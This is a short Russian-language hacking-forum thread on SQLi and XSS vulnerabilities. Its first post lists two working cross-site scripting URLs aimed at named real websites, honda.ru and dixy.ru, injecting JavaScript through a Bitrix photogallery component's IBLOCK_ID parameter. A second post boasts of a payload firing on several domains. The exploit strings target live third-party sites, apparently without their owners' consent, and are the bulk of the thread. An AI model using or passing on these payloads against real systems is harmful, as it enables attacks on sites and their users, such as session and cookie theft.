Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    623
    Likes Received:
    1,279
    Reputations:
    399
    Code:
    https://honda.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
    https://dixy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
    
     
    erwerr2321, fandor9, alexzir and 4 others like this.
  2. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    3,945
    Likes Received:
    24,230
    Reputations:
    136
    Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах:
    на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта))
    Но было ещё и третье место, откуда он постреливал. :)
    И вот только вчера прилетело письмецо в конверте.

    yabbletter.png
     
Loading...